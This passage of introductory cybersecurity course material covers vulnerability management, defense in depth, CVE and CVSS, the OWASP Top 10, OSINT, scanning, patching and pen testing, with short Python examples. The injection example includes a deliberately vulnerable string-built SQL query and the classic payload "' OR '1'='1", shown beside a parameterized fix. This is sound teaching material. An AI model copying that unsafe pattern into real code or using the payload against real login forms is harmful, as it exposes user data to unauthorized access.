windows. Glass is vulnerable to being broken. A burglar can exploit this vulnerability by using a
rock to break the window. Thinking of this vulnerability and exploit ahead of time allows us to plan
ahead. We can have an alarm system in place to scare the burglar away and alert the police. Security
teams spend a lot of time finding vulnerabilities and thinking of how they can be exploited. They do
this with the process known as vulnerability management. Vulnerability management is the process
of finding and patching vulnerabilities. Vulnerability management helps keep assets safe. It's a
method of stopping threats before they can become a problem. Vulnerability management is a four
step process. The first step is to identify vulnerabilities. The next step is to consider potential exploits
of those vulnerabilities. Third is to prepare defenses against threats. And finally, the fourth step is to
evaluate those defenses. When the last step ends, the process starts again. Vulnerability
management happens in a cycle. It's a regular part of what security teams do because there are
always new vulnerabilities to be concerned about. This is exactly why a diverse set of perspectives
is useful! Having a wide range of backgrounds and experiences only strengthens security teams and
their ability to find exploits. However, even large and diverse security teams can't keep track of
everything. New vulnerabilities are constantly being discovered. These are known as zero-day
exploits. A zero-day is an exploit that was previously unknown. The term zero-day refers to the fact
that the exploit is happening in real time with zero days to fix it. These kinds of exploits are
dangerous. They represent threats that haven't been planned for yet. For example, we can
anticipate the possibility of a burglar breaking into our home. We can plan for this type of threat by
having defenses in place, like locks on the doors and windows. A zero-day exploit would be
something totally unexpected, like the lock on the door falling off from intense heat. Zero-day
exploits are things that don't normally come to mind. For example, this might be a new form of
spyware infecting a popular website. When zero-day exploits happen, they can leave assets even
more vulnerable to threats than they already are. Vulnerability management is the process of
finding vulnerabilities and fixing their exploits. That's why the process is performed regularly at
most organizations. Perhaps the most important step of the process is identifying vulnerabilities.
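The four-step process above can be represented literally as a repeating loop. This is a toy sketch of the cycle's structure, not a real vulnerability management tool:

```python
from itertools import cycle

# The four steps of the vulnerability management cycle from the transcript.
STEPS = [
    "identify vulnerabilities",
    "consider potential exploits",
    "prepare defenses against threats",
    "evaluate those defenses",
]

def run_cycle(rounds: int):
    """The process repeats: when the last step ends, it starts again."""
    step = cycle(STEPS)
    return [next(step) for _ in range(rounds)]

print(run_cycle(5))
# ['identify vulnerabilities', 'consider potential exploits',
#  'prepare defenses against threats', 'evaluate those defenses',
#  'identify vulnerabilities']
```

The fifth item circling back to "identify vulnerabilities" captures why the transcript calls this a cycle rather than a checklist: new vulnerabilities keep appearing, so the process never truly finishes.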
Defense in depth strategy
A layered defense is difficult to penetrate. When one barrier fails, another takes its place
to stop an attack. Defense in depth is a security model that makes use of this concept. It's a layered
approach to vulnerability management that reduces risk. Defense in depth is commonly referred to
as the castle approach because it resembles the layered defenses of a castle. In the Middle Ages,
these structures were very difficult to penetrate. They featured different defenses, each unique in
its design, that posed different challenges for attackers. For example, a water-filled barrier called a
moat usually formed a circle around the castle, preventing threats like large groups of attackers
from reaching the castle walls. The few soldiers that made it past the first layer of defense were
then faced with a new challenge: giant stone walls. A vulnerability of
these structures was that they could be climbed. If attackers tried exploiting that weakness, guess
what? They were met with another layer of defense, watch towers, filled with defenders ready to
shoot arrows and keep them from climbing! Each level of defense of these medieval structures
minimized the risk of attacks by identifying vulnerabilities and implementing a security control
should one system fail. Defense in depth works in a similar way. The defense in depth concept can
be used to protect any asset. It's mainly used in cybersecurity to protect information using a five
layer design. Each layer features a number of security controls that protect information as it travels
in and out of the model. The first layer of defense in depth is the perimeter layer. This layer includes
some technologies that we've already explored, like usernames and passwords. Mainly, this is a user
authentication layer that filters external access. Its function is to only allow access to trusted
partners to reach the next layer of defense. Second, the network layer is more closely aligned with
authorization. The network layer is made up of technologies like network firewalls.
Next, is the endpoint layer. Endpoints refer to the devices that have access on a network. They could
be devices like a laptop, desktop, or a server. One example of a technology that protects these
devices is antivirus software. After that, we get to the application layer. This includes all the
interfaces that are used to interact with technology. At this layer, security measures are programmed
as part of an application. One common example is multi-factor authentication. You may be familiar
with having to enter both your password and a code sent by SMS. This is part of the application
layer of defense. And finally, the fifth layer of defense is the data layer. At this layer, we've arrived at
the critical data that must be protected, like personally identifiable information. One security
control that is important here in this final layer of defense is asset classification. Like I mentioned
earlier, information passes in and out of each of these five layers whenever it's exchanged over a
network. There are many more security
controls aside from the few that I mentioned that are part of the defense in depth model. A lot of
businesses design their security systems using the defense in depth model. Understanding this
framework hopefully gives you a better sense of how an organization's security controls work
together to protect important assets.
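The five layers and the example controls named in this lesson can be sketched as a simple lookup table. This is an illustrative Python sketch, not part of any official model; the only controls listed are the examples mentioned above.

```python
# The five defense in depth layers, mapped to the example controls from the
# lesson. Real deployments layer many more controls at each level.
DEFENSE_IN_DEPTH = {
    "perimeter": ["usernames and passwords"],        # user authentication layer
    "network": ["network firewalls"],                # authorization technologies
    "endpoint": ["antivirus software"],              # protects laptops, desktops, servers
    "application": ["multi-factor authentication"],  # security built into interfaces
    "data": ["asset classification"],                # protects critical data like PII
}

def layers_protecting(control: str) -> list[str]:
    """Return which layers list a given security control."""
    return [layer for layer, controls in DEFENSE_IN_DEPTH.items()
            if control in controls]
```

For example, `layers_protecting("antivirus software")` points back to the endpoint layer, reflecting how each control belongs to one level of the model.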
Common vulnerabilities and exposures
We've discussed before that security is a team effort. Did you know the group extends well beyond
a single security team? Protecting information is a global effort! When it comes to
vulnerabilities, there are actually online public libraries. Individuals and organizations use them to
share and document common vulnerabilities and exposures. We've been focusing a lot on
vulnerabilities. Exposures are similar, but they have a key difference. While a vulnerability is
a weakness of a system, an exposure is a mistake that can be exploited by a threat. For example,
imagine you're asked to protect an important document. Documents are vulnerable to being
misplaced. If you laid the document down near an open window, it could be exposed to being blown
away. One of the most popular libraries of vulnerabilities and exposures is the CVE list. The
common vulnerabilities and exposures list, or CVE list, is an openly accessible dictionary of known
vulnerabilities and exposures. It is a popular resource. Many organizations use the CVE list to find
ways to improve their defenses. The CVE list was originally created by the MITRE Corporation in 1999.
MITRE is a collection of non-profit research and development centers. They're sponsored by the US
government. Their focus is on improving security technologies around the world. The main purpose
of the CVE list is to offer a standard way of identifying and categorizing known vulnerabilities and
exposures. Most CVEs in the list are reported by independent researchers, technology vendors, and
ethical hackers, but anyone can report one. Before a CVE can make it onto the CVE list, it first goes
through a strict review process by a CVE Numbering Authority, or CNA. A CNA is an organization
that volunteers to analyze and distribute information on eligible CVEs. All of these groups have an
established record of researching vulnerabilities and demonstrating security advisory capabilities.
When a vulnerability or exposure is reported to them, a rigorous testing process takes place. A
vulnerability must meet four criteria before it's assigned an ID. First, it must be
independent of other issues. In other words, the vulnerability should be able to be fixed without
having to fix something else. Second, it must be recognized as a potential security risk by whoever
reports it. Third, the vulnerability must be submitted with supporting evidence. And finally, the
reported vulnerability can only affect one codebase, or in other words, only one program's source
code. For instance, the desktop version of Chrome may be vulnerable, but the Android application
may not be. If the reported flaw passes all of these tests, it is assigned a CVE ID. Vulnerabilities
added to the CVE list are often reviewed by other online vulnerability databases. These
organizations put them through additional tests to reveal how significant the flaws are and to
determine what kind of threat they pose. One of the most popular is the NIST National
Vulnerability Database. The NIST National Vulnerability Database uses what's known as the
common vulnerability scoring system, or CVSS, which is a measurement system that scores the
severity of a vulnerability. Security teams use CVSS as a way of calculating the impact a
vulnerability could have on a system. They also use these scores to determine how quickly a vulnerability
should be patched. The NIST National Vulnerability Database provides a base score for each CVE on a
scale of 0-10. Base scores reflect the moment a vulnerability is evaluated, so they don't change over
time. In general, a CVSS score below 4.0 is considered to be low risk and doesn't require
immediate attention. However, anything above a 9.0 is considered to be a critical risk to company
assets that should be addressed right away. Security teams commonly use the CVE list and CVSS
scores as part of their vulnerability management strategy. These references provide
recommendations for prioritizing security fixes, like installing software updates and patches.
Libraries like the CVE list, help organizations answer questions. Is a vulnerability dangerous to our
business? If so, how soon should we address it? These online libraries bring together diverse
perspectives from across the world. Contributing to this effort is one of my favorite parts of
working in this field. Keep gaining experience, and I hope you'll participate too!
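The severity thresholds described above can be expressed as a small function. The lesson only names the low (below 4.0) and critical thresholds; the medium and high bands in this sketch follow the published CVSS v3.x qualitative rating scale.

```python
def cvss_severity(base_score: float) -> str:
    """Map a CVSS v3.x base score (0.0-10.0) to its qualitative rating."""
    if not 0.0 <= base_score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if base_score == 0.0:
        return "None"
    if base_score < 4.0:
        return "Low"       # generally doesn't require immediate attention
    if base_score < 7.0:
        return "Medium"
    if base_score < 9.0:
        return "High"
    return "Critical"      # should be addressed right away
```

A security team might use a function like this to sort scan findings into remediation queues, patching `Critical` results first.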
The OWASP Top 10
To prepare for future risks, security professionals need to stay informed. Previously, you learned about
the CVE® list, an openly accessible dictionary of known vulnerabilities and exposures. The CVE® list is
an important source of information that the global security community uses to share information with
each other.
In this reading, you’ll learn about another important resource that security professionals reference, the
Open Web Application Security Project, recently renamed Open Worldwide Application Security
Project® (OWASP). You’ll learn about OWASP’s role in the global security community and how
companies use this resource to focus their efforts.
What is OWASP?
OWASP is a nonprofit foundation that works to improve the security of software. OWASP is an open
platform that security professionals from around the world use to share information, tools, and events
that are focused on securing the web.
The OWASP Top 10
One of OWASP’s most valuable resources is the OWASP Top 10. The organization has published this list
since 2003 as a way to spread awareness of the web’s most targeted vulnerabilities. The Top 10 mainly
applies to new or custom-made software. Many of the world's largest organizations reference the
OWASP Top 10 during application development to help ensure their programs address common
security mistakes.
Pro tip: OWASP’s Top 10 is updated every few years as technologies evolve. Rankings are based on how
often the vulnerabilities are discovered and the level of risk they present.
Note: Auditors also use the OWASP Top 10 as one point of reference when checking for regulatory
compliance.
Common vulnerabilities
Businesses often make critical security decisions based on the vulnerabilities listed in the OWASP Top
10. This resource influences how businesses design new software that will be on their network, unlike
the CVE® list, which helps them identify improvements to existing programs. These are the most
regularly listed vulnerabilities that appear in their rankings to know about:
Broken access control
Access controls limit what users can do in a web application. For example, a blog might allow visitors to
post comments on a recent article but restricts them from deleting the article entirely. Failures in these
mechanisms can lead to unauthorized information disclosure, modification, or destruction. They can
also give someone unauthorized access to other business applications.
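The blog example above can be sketched as a deny-by-default permission check. This is an illustrative sketch; the role and action names are made up for the example.

```python
# Hypothetical permission table for the blog scenario: visitors may read and
# comment, but only authors may delete an article.
PERMISSIONS = {
    "visitor": {"read_article", "post_comment"},
    "author": {"read_article", "post_comment", "delete_article"},
}

def is_allowed(role: str, action: str) -> bool:
    """Deny by default: unknown roles or actions get no access."""
    return action in PERMISSIONS.get(role, set())
```

Broken access control often comes down to a check like this being missing, inconsistent, or bypassable, rather than the check itself being hard to write.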
Cryptographic failures
Information is one of the most important assets businesses need to protect. Privacy laws such as General
Data Protection Regulation (GDPR) require sensitive data to be protected by effective encryption
methods. Vulnerabilities can occur when businesses fail to encrypt things like personally identifiable
information (PII). For example, if a web application uses a weak hashing algorithm, like MD5, it’s more
at risk of suffering a data breach.
Injection
Injection occurs when malicious code is inserted into a vulnerable application. Although the app appears
to work normally, it does things that it wasn’t intended to do. Injection attacks can give threat actors a
backdoor into an organization’s information system. A common target is a website’s login form. When
these forms are vulnerable to injection, attackers can insert malicious code that gives them access to
modify or steal user credentials.
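The login-form example can be demonstrated with Python's built-in sqlite3 module. The table and data here are made up for illustration; the point is the contrast between SQL built from strings and a parameterized query.

```python
import sqlite3

# A throwaway in-memory database standing in for a site's user store.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'x1')")

def find_user_unsafe(name: str):
    # VULNERABLE: input is pasted into the SQL string, so a crafted value
    # like "' OR '1'='1" changes the meaning of the query.
    return conn.execute(
        f"SELECT name FROM users WHERE name = '{name}'").fetchall()

def find_user_safe(name: str):
    # SAFE: a parameterized query treats the input strictly as data.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall()
```

With the injection payload `' OR '1'='1`, the unsafe query returns every user, while the parameterized query correctly finds no user by that literal name.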
Insecure design
Applications should be designed in such a way that makes them resilient to attack. When they aren’t,
they’re much more vulnerable to threats like injection attacks or malware infections. Insecure design
refers to a wide range of missing or poorly implemented security controls that should have been
programmed into an application when it was being developed.
Security misconfiguration
Misconfigurations occur when security settings aren’t properly set or maintained. Companies use a
variety of different interconnected systems. Mistakes often happen when those systems aren’t properly
set up or audited. A common example is when businesses deploy equipment, like a network server,
using default settings. This can lead businesses to use settings that fail to address the organization's
security objectives.
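The default-settings example above can be sketched as a simple inventory audit. The credential pairs and device records here are hypothetical, chosen only to illustrate the check.

```python
# A few vendor default credential pairs, made up for this example. Real audits
# would draw from a much larger, vendor-specific list.
KNOWN_DEFAULTS = {("admin", "admin"), ("admin", "password"), ("root", "root")}

def flag_default_credentials(devices: list[dict]) -> list[str]:
    """Return hostnames still configured with a known default credential pair."""
    return [d["host"] for d in devices
            if (d["username"], d["password"]) in KNOWN_DEFAULTS]
```

Running a check like this across deployed equipment is one small way teams catch misconfigurations before an attacker does.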
Vulnerable and outdated components
Vulnerable and outdated components is a category that mainly relates to application development.
Instead of coding everything from scratch, most developers use open-source libraries to complete their
projects faster and easier. This publicly available software is maintained by communities of
programmers on a volunteer basis. Applications that use vulnerable components that have not been
maintained are at greater risk of being exploited by threat actors.
Identification and authentication failures
Identification is the keyword in this vulnerability category. When applications fail to recognize who
should have access and what they’re authorized to do, it can lead to serious problems. For example, a
home Wi-Fi router normally uses a simple login form to keep unwanted guests off the network. If this
defense fails, an attacker can invade the homeowner’s privacy.
Software and data integrity failures
Software and data integrity failures are instances when updates or patches are inadequately reviewed
before implementation. Attackers might exploit these weaknesses to deliver malicious software. When
that occurs, there can be serious downstream effects. Third parties are likely to become infected if a
single system is compromised, an event known as a supply chain attack.
A famous example of a supply chain attack is the SolarWinds cyber attack (2020) where hackers injected
malicious code into software updates that the company unknowingly released to their customers.
Security logging and monitoring failures
In security, it’s important to be able to log and trace back events. Having a record of events like user
login attempts is critical to finding and fixing problems. Sufficient monitoring and incident response is
equally important.
Server-side request forgery
Companies have public and private information stored on web servers. When you use a hyperlink or
click a button on a website, a request is sent to a server that should validate who you are, fetch the
appropriate data, and then return it to you.
Server-side request forgeries (SSRFs) are when attackers manipulate the normal operations of a server
to read or update other resources on that server. These are possible when an application on the server is
vulnerable. Malicious code can be carried by the vulnerable app to the host server that will fetch
unauthorized data.
Key takeaways
Staying informed and maintaining awareness about the latest cybersecurity trends can be a useful way
to help defend against attacks and prepare for future risks in your security career. OWASP’s Top 10 is a
useful resource where you can learn more about these vulnerabilities.
Open source intelligence
Cyber attacks can sometimes be prevented with the right information, which starts with knowing where
your systems are vulnerable. Previously, you learned that the CVE® list and scanning tools are two
useful ways of finding weaknesses. But, there are other ways to identify vulnerabilities and threats.
In this reading, you’ll learn about open-source intelligence, commonly known as OSINT. OSINT is the
collection and analysis of information from publicly available sources to generate usable intelligence. It's
commonly used to support cybersecurity activities, like identifying potential threats and vulnerabilities.
You'll learn why open-source intelligence is gathered and how it can improve cybersecurity. You’ll also
learn about commonly used resources and tools for gathering information and intelligence.
Information vs intelligence
The terms intelligence and information are often used interchangeably, making it easy to mix them up.
Both are important aspects of cybersecurity that differ in their focus and objectives.
Information refers to the collection of raw data or facts about a specific subject. Intelligence, on the
other hand, refers to the analysis of information to produce knowledge or insights that can be used to
support decision-making.
For example, new information might be released about an update to the operating system (OS) that's
installed on your organization's workstations. Later, you might find that new cyber threats have been
linked to this new update by researching multiple cybersecurity news resources. The analysis of this
information can be used as intelligence to guide your organization's decision about installing the OS
updates on employee workstations.
In other words, intelligence is derived from information through the process of analysis, interpretation,
and integration. Gathering information and intelligence are both important aspects of cybersecurity.
Intelligence improves decision-making
Businesses often use information to gain insights into the behavior of their customers. Insights, or
intelligence, can then be used to improve their decision making. In security, open-source information is
used in a similar way to gain insights into threats and vulnerabilities that can pose risks to an
organization.
OSINT plays a significant role in information security (InfoSec), which is the practice of keeping data in
all states away from unauthorized users.
For example, a company's InfoSec team is responsible for protecting their network from potential
threats. They might utilize OSINT to monitor online forums and hacker communities for discussions
about emerging vulnerabilities. If they come across a forum post discussing a newly discovered
weakness in a popular software that the company uses, the team can quickly assess the risk, prioritize
patching efforts, and implement necessary safeguards to prevent an attack.
Here are some of the ways OSINT can be used to generate intelligence:
● To provide insights into cyber attacks
● To detect potential data exposures
● To evaluate existing defenses
● To identify unknown vulnerabilities
Collecting intelligence is sometimes part of the vulnerability management process. Security teams might
use OSINT to develop profiles of potential targets and make data driven decisions on improving their
defenses.
OSINT tools
There's an enormous amount of open-source information online. Finding relevant information that can
be used to gather intelligence is a challenge. Information can be gathered from a variety of sources, such
as search engines, social media, discussion boards, blogs, and more. Several tools also exist that can be
used in your intelligence gathering process. Here are just a few examples of tools that you can explore:
● VirusTotal is a service that allows anyone to analyze suspicious files, domains, URLs, and IP addresses for malicious content.
● MITRE ATT&CK® is a knowledge base of adversary tactics and techniques based on real-world observations.
● OSINT Framework is a web-based interface where you can find OSINT tools for almost any kind of source or platform.
● Have I Been Pwned is a tool that can be used to search for breached email accounts.
There are numerous other OSINT tools that can be used to find specific types of information. Remember,
information can be gathered from a variety of sources. Ultimately, it's your responsibility to thoroughly
research any available information that's relevant to the problem you’re trying to solve.
Key takeaways
Gathering information and intelligence are important aspects of cybersecurity. OSINT is used to make
evidence-based decisions that can be used to prevent attacks. There’s so much information available,
which is why it's important for security professionals to be skilled with searching for information.
Having familiarity with popular OSINT tools and resources will make your research easier when
gathering information and collecting intelligence.
Vulnerability assessments
Our exploration of the vulnerability management process so far has been focused on a couple of
topics. We've discussed how vulnerabilities influence the design of defenses. We've also talked
about how common vulnerabilities are shared. A topic we're yet to cover is how vulnerabilities are
found in the first place. Weaknesses and flaws are generally found during a
vulnerability assessment. A vulnerability assessment is the internal review process of an
organization's security systems. These assessments work like the process of identifying and
categorizing vulnerabilities on the CVE list. The main difference is the organization's security team
performs, evaluates, scores, and fixes them on their own. Security analysts play a key role
throughout this process. Overall, the goal of a vulnerability assessment is to identify weak points
and prevent attacks. They're also how security teams determine whether their security controls
meet regulatory standards. Organizations perform vulnerability assessments a lot. Because
companies have so many assets to protect, security teams sometimes need to select which area to
focus on through vulnerability assessments. Once they decide what to focus on, vulnerability
assessments typically follow a four-step process. The first step is identification. Here, scanning tools
and manual testing are used to find vulnerabilities. During the identification step, the goal is to
understand the current state of a security system, like taking a picture of it. Many findings usually
appear after identification. The next step of the process is vulnerability analysis. During this step,
each of the vulnerabilities that were identified are tested. By being a digital detective, the goal of
vulnerability analysis is to find the source of the problem. The third step of the process is risk
assessment. During this step of the process, a score is assigned to each vulnerability. This score is
assigned based on two factors: how severe the impact would be if the vulnerability were to be
exploited and the likelihood of this happening. Vulnerabilities uncovered during the first two steps
of this process often outnumber the people available to fix them. Risk assessments are a way of
prioritizing resources to handle the vulnerabilities that need to be addressed based on their score.
The fourth and final step of vulnerability assessment is remediation. It's during this step that the
vulnerabilities that can impact the organization are addressed. Remediation occurs depending on
the severity score assigned during the risk assessment step. This part of the process is normally a
joint effort between the security staff and IT teams to come up with the best approach to fixing the
vulnerabilities that were uncovered earlier. Examples of remediation steps might include things
like enforcing new security procedures, updating operating systems, or implementing system
patches. Vulnerability assessments are great for identifying the flaws of a system. Most
organizations use them to search for problems before they happen. But how do we know where to
search? When we get together again, we'll explore how companies figure this out.
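The risk assessment step described above is often modeled as impact multiplied by likelihood. This sketch uses made-up 1-5 scales and hypothetical findings; real scoring systems like CVSS are far more detailed, but the prioritization idea is the same.

```python
def risk_score(impact: int, likelihood: int) -> int:
    """Score a finding: both factors on a 1 (low) to 5 (high) scale."""
    return impact * likelihood

def prioritize(findings: list[dict]) -> list[dict]:
    """Order findings so the highest-risk vulnerabilities are remediated first."""
    return sorted(findings,
                  key=lambda f: risk_score(f["impact"], f["likelihood"]),
                  reverse=True)
```

Because findings usually outnumber the people available to fix them, an ordering like this is what lets remediation effort go where it matters most.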
Approaches to vulnerability scanning
Previously, you learned about a vulnerability assessment, which is the internal review process of an
organization's security systems. An organization performs vulnerability assessments to identify
weaknesses and prevent attacks. Vulnerability scanning tools are commonly used to simulate threats by
finding vulnerabilities in an attack surface. They also help security teams take proactive steps towards
implementing their remediation strategy.
Vulnerability scanners are important tools that you'll likely use in the field. In this reading, you’ll explore
how vulnerability scanners work and the types of scans they can perform.
What is a vulnerability scanner?
A vulnerability scanner is software that automatically compares known vulnerabilities and exposures
against the technologies on the network. In general, these tools scan systems to find misconfigurations
or programming flaws.
Scanning tools are used to analyze each of the five attack surfaces that you learned about in the video
about the defense in depth strategy:
1. Perimeter layer, like authentication systems that validate user access
2. Network layer, which is made up of technologies like network firewalls and others
3. Endpoint layer, which describes devices on a network, like laptops, desktops, or servers
4. Application layer, which involves the software that users interact with
5. Data layer, which includes any information that’s stored, in transit, or in use
When a scan of any layer begins, the scanning tool compares the findings against databases of security
threats. At the end of the scan, the tool flags any vulnerabilities that it finds and adds them to its
reference database. Each scan adds more information to the database, helping the tool be more accurate
in its analysis.
Note: Vulnerability databases are also routinely updated by the company that designed the scanning
software.
Performing scans
Vulnerability scanners are meant to be non-intrusive, meaning they don’t break or take advantage of a
system like an attacker would. Instead, they simply scan a surface and alert you to any potentially
unlocked doors in your systems.
Note: While vulnerability scanners are non-intrusive, there are instances when a scan can inadvertently
cause issues, like crash a system.
There are a few different ways that these tools are used to scan a surface. Each approach corresponds to
the pathway a threat actor might take. Next, you can explore each type of scan to get a clearer picture of
this.
External vs. internal
External and internal scans simulate an attacker's approach.
External scans test the perimeter layer outside of the internal network. They analyze outward-facing
systems, like websites and firewalls. These kinds of scans can uncover vulnerabilities like exposed
network ports or servers.
Internal scans start from the opposite end by examining an organization's internal systems. For
example, this type of scan might analyze application software for weaknesses in how it handles user
input.
Authenticated vs. unauthenticated
Authenticated and unauthenticated scans simulate whether or not a user has access to a system.
Authenticated scans might test a system by logging in with a real user account or even with an admin
account. These service accounts are used to check for vulnerabilities, like broken access controls.
Unauthenticated scans simulate external threat actors that do not have access to your business
resources. For example, a scan might analyze file shares within the organization that are used to house
internal-only documents. Unauthenticated users should receive "access denied" results when they try
to open these files. However, a vulnerability would be identified if the scan were able to access a file.
Limited vs. comprehensive
Limited and comprehensive scans focus on particular devices that are accessed by internal and external
users.
Limited scans analyze particular devices on a network, like searching for misconfigurations on a
firewall.
Comprehensive scans analyze all devices connected to a network. This includes operating systems, user
databases, and more.
Pro tip: Discovery scanning should be done prior to limited or comprehensive scans. Discovery scanning
is used to get an idea of the computers, devices, and open ports that are on a network.
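The three scan dimensions above can be combined into a single scan plan. This is a hypothetical sketch; the field names and values don't correspond to any particular scanner product.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ScanPlan:
    """One combination of the scan dimensions described in this reading."""
    origin: str         # "external" or "internal"
    credentialed: bool  # authenticated (True) vs. unauthenticated (False)
    scope: str          # "limited" or "comprehensive"

def describe(plan: ScanPlan) -> str:
    """Summarize a plan the way a team might label it in a report."""
    auth = "authenticated" if plan.credentialed else "unauthenticated"
    return f"{plan.origin}, {auth}, {plan.scope} scan"
```

For instance, an external, unauthenticated, limited scan of a firewall approximates what an outside attacker with no credentials would see on that one device.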
Key takeaways
Finding vulnerabilities requires thinking of all possibilities. Vulnerability scans vary depending on the
surfaces that an organization is evaluating. Usually, seasoned security professionals lead the effort of
configuring and performing these types of scans to create a profile of a company’s security posture.
However, analysts also play an important role in the process. The results of a vulnerability scan often
lead to renewed compliance efforts, procedural changes, and system patching. Understanding the
objectives of common types of vulnerability scans will help you participate in these proactive security
exercises whenever possible.
Tip: To explore vulnerability scanner software commonly used in the cybersecurity industry, in your
preferred browser enter search terms like “popular vulnerability scanner software” and/or “open
source vulnerability scanner software used in cybersecurity”.
The importance of updates
At some point in time, you may have wondered, “Why do my devices constantly need updating?” For
consumers, updates provide improvements to performance, stability, and even new features! But from a
security standpoint, they serve a specific purpose. Updates allow organizations to address security
vulnerabilities that can place their users, devices, and networks at risk.
In a video, you learned that updates fit into every security team’s remediation strategy. They usually
take place after a vulnerability assessment, which is the internal review process of an organization's
security systems. In this reading, you’ll learn what updates do, how they’re delivered, and why they’re
important to cybersecurity.
Patching gaps in security
An outdated computer is a lot like a house with unlocked doors. Malicious actors use these gaps in
security the same way, to gain unauthorized access. Software updates are similar to locking the doors to
keep them out.
A patch update is a software and operating system update that addresses security vulnerabilities within
a program or product. Patches usually contain bug fixes that address common security vulnerabilities
and exposures.
Note: Ideally, patches address common vulnerabilities and exposures before malicious hackers find
them. However, patches are sometimes developed as a result of a zero-day, which is an exploit that was
previously unknown.
Common update strategies
When software updates become available, clients and users have two installation options:
● Manual updates
● Automatic updates
As you’ll learn, each strategy has both benefits and disadvantages.
Manual updates
A manual deployment strategy relies on IT departments or users obtaining updates from the developers.
Home office or small business environments might require you to find, download, and install updates
yourself. In enterprise settings, the process is usually handled with a configuration management tool.
These tools offer a range of options to deploy updates, like to all clients on your network or a select
group of users.
Advantage: An advantage of manual update deployment strategies is control. That can be useful if
software updates are not thoroughly tested by developers, leading to instability issues.
Disadvantage: A drawback to manual update deployments is that critical updates can be forgotten or
disregarded entirely.
Automatic updates
An automatic deployment strategy takes the opposite approach. With this option, finding, downloading,
and installing updates can be done by the system or application.
Pro tip: The Cybersecurity and Infrastructure Security Agency (CISA) recommends using automatic
options whenever they’re available.
Certain permissions need to be enabled by users or IT groups before updates can be installed, or pushed,
when they're available. It is up to the developers to adequately test their patches before release.
Advantage: An advantage to automatic updates is that the deployment process is simplified. It also keeps
systems and software current with the latest, critical patches.
Disadvantage: A drawback to automatic updates is that instability issues can occur if the patches were
not thoroughly tested by the vendor. This can result in performance problems and a poor user
experience.
End-of-life software
Sometimes updates are not available for a certain type of software known as end-of-life (EOL) software.
All software has a lifecycle. It begins when it’s produced and ends when a newer version is released. At
that point, developers must allocate resources to the newer versions, which leads to EOL software.
While the older software is still useful, the manufacturer no longer supports it.
Note: Patches and updates are very different from upgrades. Upgrades refer to completely new versions
of hardware or software that can be purchased.
CISA recommends discontinuing the use of EOL software because it poses an unfixable risk to systems.
But, this recommendation is not always followed. Replacing EOL technology can be costly for businesses
and individual users.
The risks that EOL software presents continue to grow as more connected devices enter the
marketplace. For example, there are billions of Internet of Things (IoT) devices, like smart light bulbs,
connected to home and work networks. In some business settings, all an attacker needs is a single
unpatched device to gain access to the network and cause problems.
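The EOL risk described above can be sketched as an inventory check that flags software past its support date. The product names and dates here are made up for the example.

```python
from datetime import date

def find_eol(inventory: list[dict], today: date) -> list[str]:
    """Return names of products whose end-of-life date has already passed.

    Each inventory item is a dict with a "name" and an "eol" date.
    """
    return [item["name"] for item in inventory if item["eol"] < today]
```

A recurring report like this helps teams spot the single unpatched or unsupported device that could give an attacker a way in.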
Key takeaways
Updating software and patching vulnerabilities is an important practice that everyone should
participate in. Unfortunately, that’s not always the case. Many of the biggest cyber attacks in the world
might have been prevented if systems were kept updated. One example is the WannaCry attack of 2017.
The attack affected computers in more than 150 countries and caused an estimated $4 billion in
damages. Researchers have since found that WannaCry could have been prevented if the infected
systems were up-to-date with a security patch that was made available months before the attack.
Keeping software updated requires effort. However, the benefits updates provide make the effort worthwhile.
Penetration testing
An effective security plan relies on regular testing to find an organization's weaknesses. Previously, you
learned that vulnerability assessments, the internal review process of an organization's security systems,
are used to design defense strategies based on system weaknesses. In this reading, you'll learn how
security teams evaluate the effectiveness of their defenses using penetration testing.
Penetration testing
A penetration test, or pen test, is a simulated attack that helps identify vulnerabilities in systems,
networks, websites, applications, and processes. The simulated attack in a pen test involves using the
same tools and techniques as malicious actors in order to mimic a real life attack. Since a pen test is an
authorized attack, it is considered to be a form of ethical hacking. Unlike a vulnerability assessment that
finds weaknesses in a system's security, a pen test exploits those weaknesses to determine the potential
consequences if the system breaks or gets broken into by a threat actor.
For example, the cybersecurity team at a financial company might simulate an attack on their banking
app to determine if there are weaknesses that would allow an attacker to steal customer information or
illegally transfer funds. If the pen test uncovers misconfigurations, the team can address them and
improve the overall security of the app.
Note: Organizations that are regulated by PCI DSS, HIPAA, or GDPR must routinely perform penetration
testing to maintain compliance standards.
Learning from varied perspectives
These authorized attacks are performed by pen testers who are skilled in programming and network
architecture. Depending on their objectives, organizations might use a few different approaches to
penetration testing:
● Red team tests simulate attacks to identify vulnerabilities in systems, networks, or applications.
● Blue team tests focus on defense and incident response to validate an organization's existing security systems.
● Purple team tests are collaborative, focusing on improving the security posture of the organization by combining elements of red and blue team exercises.
Red team tests are commonly performed by independent pen testers who are hired to evaluate internal systems. However, cybersecurity teams may also have their own pen testing experts. Regardless of the
approach, penetration testers must make an important decision before simulating an attack: How much
access and information do I need?
Penetration testing strategies
There are three common penetration testing strategies:
● Open-box testing is when the tester has the same privileged access that an internal developer would have—information like system architecture, data flow, and network diagrams. This strategy goes by several different names, including internal, full knowledge, white-box, and clear-box penetration testing.
● Closed-box testing is when the tester has little to no access to internal systems—similar to a malicious hacker. This strategy is sometimes referred to as external, black-box, or zero-knowledge penetration testing.
● Partial knowledge testing is when the tester has limited access and knowledge of an internal system—for example, a customer service representative. This strategy is also known as gray-box testing.
Closed-box testers tend to produce the most accurate simulations of a real-world attack. Nevertheless,
each strategy produces valuable results by demonstrating how an attacker might infiltrate a system and
what information they could access.
Becoming a penetration tester
Penetration testers are in-demand in the fast growing field of cybersecurity. All of the skills you’re
learning in this program can help you advance towards a career in pen testing:
● Network and application security
● Experience with operating systems, like Linux
● Vulnerability analysis and threat modeling
● Detection and response tools
● Programming languages, like Python and BASH
● Communication skills
Programming skills are very helpful in penetration testing because it's often performed on software and
IT systems. With enough practice and dedication, cybersecurity professionals at any level can develop
the skills needed to be a pen tester.
Bug bounty programs
Organizations commonly run bug bounty programs, which offer freelance pen testers financial rewards
for finding and reporting vulnerabilities in their products. Bug bounties are great opportunities for
amateur security professionals to participate and grow their skills.
Pro tip: HackerOne is a community of ethical hackers where you can find active bug bounties to
participate in.
Key takeaways
A major risk for organizations is malicious hackers breaking into their systems. Penetration testing is
